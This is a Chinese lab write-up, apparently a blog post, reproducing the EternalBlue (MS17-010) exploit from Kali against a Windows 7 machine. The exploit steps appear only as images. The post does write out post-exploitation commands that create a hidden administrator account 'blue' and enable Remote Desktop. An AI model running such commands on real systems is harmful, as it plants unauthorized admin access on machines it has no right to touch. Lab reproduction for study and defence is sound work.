[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell

1、漏洞简介

MS17-010(永恒之蓝)应用的不仅仅是一个漏洞,而是包含Windows SMB 远程代码执行漏洞CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148在内的6个SMB漏洞。
漏洞的原理可参考https://www.cnblogs.com/Qujinkongyuyin/p/9266958.html
WannaCry勒索病毒,黑客拿着美国安全局泄露的永恒之蓝攻击代码进行研制,并进行大肆勒索传播。

2、复现环境

  • 渗透机 kali 2019.3 ip:192.168.43.177
  • 耙机 win7 sp1 ip:192.168.43.196

3、实验步骤

3.1检索利用模块

image.png

3.2 扫描目标是否含有该漏洞

image.png

3.3 漏洞利用

image.png

3.4 getshell

image.png

3.5 创建用户开启远程桌面

创建用户名密码 blue/blue
net user blue blue /add
将用户blue添加入管理组
net localgroup administrators blue /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
使用mstsc进行远程

参考资料

https://mp.weixin.qq.com/s?__biz=MzI5ODU1MjIwMg==&mid=2247484114&idx=1&sn=c616b9dac3fa71cdb8705e2eb6227979&chksm=eca55c37dbd2d521a34a254e34febded27a297240719a9973840dc863b1ea011f23b565640bf&scene=21#wechat_redirect

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值